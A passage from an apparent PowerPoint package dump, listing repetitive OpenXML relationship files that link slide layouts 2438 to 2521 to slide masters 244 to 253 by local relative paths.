<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster244.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2438.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster244.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2439.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster244.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout244.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440.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster244.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2441.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster245.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2442.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster245.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2443.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster245.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2444.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster245.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2445.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster245.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2446.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster245.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2447.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster245.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2448.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster245.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2449.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster245.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout245.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450.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster245.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2451.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster246.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2452.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster246.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2453.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster246.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2454.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster246.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2455.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster246.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2456.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster246.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2457.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster246.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2458.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster246.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2459.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster246.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout246.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460.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster246.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2461.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster247.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2462.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster247.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2463.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster247.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2464.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster247.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2465.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster247.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2466.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster247.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2467.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster247.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2468.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster247.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2469.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster247.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout247.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470.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster247.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2471.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster248.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2472.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster248.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2473.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster248.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2474.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster248.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2475.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster248.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2476.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster248.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2477.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster248.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2478.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster248.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2479.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster248.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout248.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480.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster248.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2481.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster249.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2482.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster249.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2483.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster249.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2484.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster249.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2485.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster249.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2486.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster249.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2487.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster249.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2488.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster249.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2489.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster249.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout249.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490.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster249.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2491.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster250.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2492.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster250.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2493.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster250.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2494.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster250.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2495.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster250.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2496.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster250.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2497.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster250.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2498.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster250.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2499.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster250.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50.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500.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster250.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2501.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster251.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2502.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster251.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2503.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster251.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2504.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster251.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2505.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster251.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2506.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster251.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2507.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster251.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2508.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster251.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2509.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster251.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout251.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510.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster251.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2511.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster252.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2512.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster252.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2513.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster252.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2514.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster252.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2515.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster252.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2516.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster252.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2517.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster252.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2518.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster252.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2519.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster252.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout252.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520.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster252.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout2521.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster253.xml"/></Relationships>
</file>

